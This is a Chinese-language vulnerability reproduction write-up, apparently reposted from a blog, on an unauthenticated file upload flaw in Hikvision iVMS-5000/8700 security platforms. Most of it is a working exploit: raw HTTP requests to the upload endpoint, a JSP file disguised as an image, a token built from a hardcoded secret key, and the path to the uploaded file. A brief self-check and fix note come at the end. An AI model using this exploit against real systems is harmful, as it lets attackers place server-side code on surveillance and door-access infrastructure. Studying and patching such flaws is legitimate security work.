漏洞复现-海康威视
海康iVMS综合安防存在文件上传
https://mp.weixin.qq.com/s/Ajod_ZM1nTFhi1Gvb0CGig
综合安防系统是一款功能强大的综合性管理平台,其特点是视频监控与门禁一卡通的深度融合,海康的系统在系统中大量存在,出于学习的目的,通过授权测试对象对该漏洞进行研究和复现。
海康威视综合安防系统iVMS-5000
海康威视综合安防系统 iVMS-8700
POST /eps/api/resourceOperations/upload HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: http://ip:port Connection: close Cookie: ISMS_8700_Sessionname=7634604FBE659A8532E666FE4AA41BE9 Upgrade-Insecure-Requests: 1 Content-Length: 62 service=http%3A%2F%2Fip:port%3Ax%2Fhome%2Findex.action POST /eps/api/resourceOperations/upload?token=构造的token值 HTTP/1.1 Host: your-ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Cookie: ISMS_8700_Sessionname=A29E70BEA1FDA82E2CF0805C3A389988
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryGEJwiloiPo
Upgrade-Insecure-Requests: 1
Content-Length: 174
------WebKitFormBoundaryGEJwiloiPo
Content-Disposition: form-data; name="fileUploader";filename="1.jsp"
Content-Type: image/jpeg
test
------WebKitFormBoundaryGEJwiloiPo
其中token的值为
MD5(http://ip:port/eps/api/resourceOperations/uploadsecretKeyIbuilding)的值
访问上传文件的路径为http://ip:port/eps/upload/resourceUuid.jsp
自查方式:通过发送前文提到的漏洞探测数据包,观察返回的状态码为200,并且提示token empty!字样则可能存在漏洞,需要及时排查修复。
修复建议:关闭互联网暴露面访问的权限,文件上传模块做好权限强认证。
参考链接:
https://blog.csdn.net/qq_50854662/article/details/131481634
文章评论